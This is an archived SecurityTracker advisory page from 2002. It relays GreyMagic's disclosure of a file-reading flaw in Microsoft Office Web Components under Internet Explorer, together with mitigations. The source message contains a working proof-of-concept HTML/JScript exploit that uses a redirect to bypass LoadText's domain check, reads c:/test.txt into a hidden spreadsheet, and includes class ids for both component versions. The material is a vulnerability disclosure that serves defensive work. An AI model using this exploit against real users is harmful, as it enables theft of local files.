SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   Microsoft Office Vendors:   Microsoft
Microsoft Office Web Components Let Remote Users Write Code to Run in the Victim's Local Security Domain and Access Local or Remote Files
SecurityTracker Alert ID:  1004000
SecurityTracker URL:  http://securitytracker.com/id/1004000
CVE Reference:   CAN2002-0860   (Links to External Site)
Date:  Apr 9 2002
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): Office 2000 Office Web Components 9 Spreadsheet component, Office XP Office Web Components 10 Spreadsheet component
Description:   GreyMagic Software has issued several advisories warning of scripting vulnerabilities in Microsoft Office due to flaws in Microsoft's Office Web Components. In this advisory, they indicate that remotely supplied HTML can cause Internet Explorer read local files.

Several vulnerabilities were reported in Microsoft's Office Web Components (OWC), which is included in Microsoft Office but is also available as a standalone viewer. OWC is reported to be a group of components marked as of 'safe for scripting' and used to enrich HTML documents with spreadsheets, charts, pivot tables and more.

A remote user can apparently exploit OWC9 and OWC10 to cause IE to ready any local or remote file via the "LoadText" method of the Range object. If the URL supplied to this method is not the same security domain as the current document, the function apparently returns an error. However, a user can reportedly bypass this restriction by using a URL that will redirect to the desired local or remote file. OWC will then interpret the URL as safe to load and will load the contents of the file into the spreadsheet, according to the advisory.

A demonstration exploit is provided in the Source Message.

The vendor has reportedly been notified.

For more information, see:

http://security.greymagic.com/adv/gm006-ie/

Impact:   A remote user can create HTML containing code that will, when loaded by the target (victim) user, run in the local user security context and be able to retrieve local or remote files.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following recommendation:

"Set 'Run ActiveX controls and plug-ins' to 'Disable' or simply remove/disable OWC until a patch becomes available."

Also, according to NTBugtraq, IE 6.0 provides the administrator with the ability to create lists of administrator-approved ActiveX controls. A user with 'Administrator' privileges can apparently restrict which controls can be scripted.

Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Microsoft Issues Fix for OWC) Microsoft Office Web Components Let Remote Users Write Code to Run in the Victim's Local Security Domain and Access Local or Remote Files
The vendor has released a fix for OWC.



 Source Message Contents

Subject:  Reading local files with OWC in IE (GM#006-IE)


GreyMagic Security Advisory GM#006-IE
=====================================

By GreyMagic Software, Israel.
08 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm006-ie/.

Topic: Reading local files with OWC in IE.

Discovery date: 24 Feb 2002.

Affected applications:
======================

* Office 2000 - Office Web Components 9, Spreadsheet component.
* Office XP - Office Web Components 10, Spreadsheet component.


Introduction:
=============

Office Web Components (OWC) is a group of safe for scripting components used
to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as
a separate (free for viewing only) component.


Discussion:
===========

Using the Spreadsheet component in both OWC9 and OWC10, it is possible to
read any local or remote file.

The "LoadText" method of the Range object takes a URL as its first argument;
it throws an error if the URL supplied is not in the same domain as the
current document.

However, this protection can be easily bypassed by supplying a URL that will
redirect to the desired local or remote file.

OWC is fooled to think that the URL is safe and loads the contents of the
file into the spreadsheet; it is then trivial to retrieve the content and
transfer it to the server or use it in malicious ways.


Exploit:
========

This example reads the contents of the file "c:/test.txt", the URL
"getFile.asp" is redirecting to "file://c:/test.txt", allowing us to access
it:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
    try {
        // Load file into spreadsheet
        oSP.ActiveSheet.UsedRange.LoadText("getFile.asp");

        // Read the spreadsheet
        var oRng=oSP.ActiveSheet.UsedRange,
            iRows=oRng.Rows.Count,
            iCols=oRng.Columns.Count,
            sRes="";

        for (var iCRow=1;iCRow<=iRows;iCRow++) {
            for (var iCCol=1;iCCol<=iCols;iCCol++) {
                sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
            }
            sRes+="\n";
        }

        // Display result
        alert(sRes);
    }
    catch (oErr) {
        // Failed
        alert("File not found.");
    }
}
</script>

The class id of the <object> element above is for the spreadsheet component
of OWC9 (Microsoft Office 2000), OWC10's class id is
"0002E551-0000-0000-C000-000000000046", no further changes in code are
needed.

An attacker can actually use the fallback feature of the <object> element to
include either one of these components:

<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
style="display:none">
        <!-- None found -->
        Failed to load any of the spreadsheet components.
    </object>
</object>


Solution:
=========

Set "Run ActiveX controls and plug-ins" to "Disable" or simply
remove/disable OWC until a patch becomes available.

Microsoft has been informed, they have opened an investigation regarding
this issue.


Tested on:
==========

IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6 Win2000 + Office 2000 (OWC9), all patches.
IE6 WinXP + Office XP (OWC10), all patches.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of this issue is available at
http://security.greymagic.com/adv/gm006-ie/.


Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

- Copyright 2002 GreyMagic Software.


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC